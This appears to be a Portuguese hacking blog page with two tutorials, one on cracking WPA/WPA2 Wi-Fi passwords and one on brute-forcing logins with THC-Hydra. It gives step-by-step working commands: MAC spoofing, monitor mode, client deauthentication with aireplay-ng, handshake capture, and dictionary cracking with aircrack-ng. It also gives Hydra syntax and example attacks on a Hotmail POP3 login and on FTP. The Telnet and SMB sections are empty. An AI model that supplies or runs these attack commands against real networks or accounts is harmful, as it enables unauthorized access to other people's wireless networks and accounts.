Mostrar mensagens com a etiqueta Passwords. Mostrar todas as mensagens
Mostrar mensagens com a etiqueta Passwords. Mostrar todas as mensagens

20/06/10

Crack Passwords Wpa/Wpa2

Crack Passwords Wpa/Wpa2 

 

Autor: MrTcp

Ferramentas: Airodump-ng, Airplay-ng,Aircrack-ng

Video : http://blip.tv/file/3429237/


Bem Vindos esta vídeo aula vamos ver como descobrir  uma password de uma rede wireless protegida por WPA2.
Para puder-mos descobrir uma senha wireless precisamos ter uma placa wireless que suporte injecção de pacotes, já existem varias a venda e só perguntar ao Google, placas compatíveis com Windows são mais difíceis de arranjar. Entretanto precisamos decidir que sistema operativo vamos usar eu pessoalmente prefiro Linux para estes serviços :-)
Vamos precisar de uma ferramenta chamada Aircrack-ng, esta ferramenta já vem instalada no Backtrack e com as drivers compiladas, se quiseres usar numa outra distribuição vais ter fazer o Download das drivers e respectivas Patches para a tua placa wireless, nesta vídeo aula não vamos ver como instalar e compilar as drivers, numa outra aula mais a frente talvez.
Para descobrir a password de uma rede wireless WPA2 temos de desautenticar o cliente do access point , para pudermos capturar os pacotes que contêm a password e depois a pudermos decifrar.

//Alterar o MacAddress da nossa placa wireless;

#ifconfig wlan0 down

#macchanger --mac 00:11:22:33:44:55 wlan0
//Colocar placa em modo monitor, depois de digitar-mos este comando vai ser criada uma outra interface no meu caso é a mon0

#airmon-ng start wlan0
//Verificar as redes wireless, verificar o canal em que a rede esta a operar e o bssid do AccessPoint para utilizar no airodump-ng
 
#airodump-ng mon0
//Depois de verificado o canal e o bssid usar o airodump-ng para capturar toda a informação para um ficheiro com o seguinte comando;
#airodump-ng -c 11 -w justtry --bssid 00:22:3F:D2:C6:AB mon0   

//Definiçoes : no -c colocamos o canal em que a rede esta a operar, no -w fica o nome do ficheiro que vamos gerar no --bssid colocamos o MacAddress do Access Point;

//Depois de estar tudo a ser capturado para o ficheiro temos de desautenticar o cliente do Access Point com o seguinte comando;

#aireplay-ng -0 20 -a 00:22:3F:D2:C6:AB -c 00:25:69:B5:27:F7 mon0
// Descrição : no parâmetro -0 e a opção do aireplay-ng para desautenticar os clientes dos AP's (Access Point's) o numero 20 é o numero de vezes que vai mandar as desautenticações, o -a colocamos o MacAddress do AP e no -c colocamos o MacAddress do Cliente, passado uns segundos temos o nosso HANDSHAKE, depois é só usar o aircrack-ng para crackar a password com o seguinte comando;
#aircrack-ng -w darkc0de.lst justtry_01.cap
//Descrição : no parametro -w utilizamos o caminho para o nosso dicionário no meu caso esta na raiz, depois colocamos o nome do ficheiro .pcap criado pelo airodump-ng
//Agora é só esperar ate a senha estar descoberta, lembre-se para que possam descobrir a password, ela tem de estar no vosso dicionário, senão nada feito. Existe técnicas como as Rainbow  Tables que permite-nos usar mais palavras por segundo do que este método aqui utilizado. Futuramente vou fazer uma vídeo aula de como criar Rainbow Tables para chaves wireless e outra de como as usar. Ate breve

THC-Hydra

THC-Hydra
http://freeworld.thc.org
12-05-2010
O THC-Hydra é uma ferramenta para ataques de força-bruta (brute-force) para vários protocolos de rede actualmente são suportados os protocolos listados em baixo, neste tutorial não vamos abordar todos os protocolos , futuramente vamos falar sobre cada um deles;
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
          RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
          ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable,
          LDAP2, Cisco AAA


Neste tutorial vamos utilizar o THC-Hydra para descobrir senhas dos seguintes protocolos: pop3, FTP, Telnet e SMB, todos os ataques vão ser realizados em maquinas virtuais dentro da minha rede e todas as passwords vão ser previamente definidas no dicionário a utilizar;
Ip do Servidor : 192.168.10.5
Ip Local : 192.168.10.3
Utilizador: MrTcp
Email – MrTcp-teste[at]live.com.pt
Password - *****

Sintaxe:

 hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
 [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
 server service [OPT]

Options:
  -R        #Restaura uma sessão abortada;
  -S        #Conecta via SSL
  -s porta              #Se o serviço estiver a correr numa porta diferente definir aqui
  -l           #Utilizador a utilizar;
 -L           #Ficheiro com varios utilizadores a utilizar;
 -p          #Password a utilizar;
-P           #Ficheiro ou dicionário de passwords a utilizar;
  -e ns     #Informação adicional o “n” verifica se existe passwords nulas e o “s” experimenta o nome do utilizador como password;
  -C ficheiro         #Ficheiro com utilizadores e passwords em coluna com o seguinte formato: "login:pass" e um por linha, é usado em vês das opções –Le –P;
  -M ficheiro       #Lista de servidores para ataques paralelos, um por linha;
  -o ficheiro         #Escreve utilizadores e passwords encontrados para um ficheiro em vez do stdout que imprime na tela;
  -f          #Desconecta depois de encontrar o primeiro utilizador/password;
  -t TASKS            #Executa as tarefas conforme o numero de ligações em paralelo, o padrão são 16;
  -w tempo         #Define o tempo maximo de espera em segundos para responder, o padrao é 30;  
  -v / -V                                 #Modo detalhado;
  Servidor            #IP ou DNS do servidor alvo, pode-se usar a opção –M em substituição desta;   
  Service               “Serviço ou protocolo a atacar, temos os seguintes disponíveis:
telnet,  ftp,  pop3[-ntlm],   imap[-ntlm], smb, smbnt, http[s]-{head|get} , http-{get|post}-form , http-proxy,  cisco ,  cisco-enable,  vnc,  ldap2,  ldap3,  mssql,  mysql,  oracle-listener,  postgres,  nntp,  socks5,    rexec,  rlogin,  pcnfs,  snmp,  rsh,  cvs,  svn,  icq,  sapr3,  ssh2,  smtp-auth[-ntlm] , pcanywhere,   teamspeak,  sip,  vmauthd …

------------------------------------------------------------------------------------------------------------------------------





POP3
Neste exemplo vamos descobrir a password do email mrtcp-teste[at]live.com.pt usando o ataque de força bruta, este email é meu e foi criado previamente para este exemplo;
Sintaxe:
#hydra –S –v –l mrtcp-teste[at]live.com.pt–P /root/dic.dic pop3.live.com pop3
Definição:
-S    -> Conecta por ligação segura;
-v    -> Modo detalhe, permite verificar as passwords mais facilmente;
-l   -> Email a descobrir a password;
-P  -> Directorio onde se encontra o dicionário a utilizar;
Pop3.live.com   -> Dns do servidor POP3 da Hotmail;
Pop3  -> Protocolo a ser utilizado, neste caso é o POP3;


 -----------------------------------------------------------------------------------------------------------------------------------

FTP

hydra 192.168.10.3 ftp -l mrtcp -P /root/dic.txt -e ns -t 15 -f -o /root/pass 

-------------------------------------------------------------------------------------------------------------------------------------

TELNET


-------------------------------------------------------------------------------------------------------------------------------------
SMB



---------------------------------------------------------------------------------------------------------------------------------------


Vídeo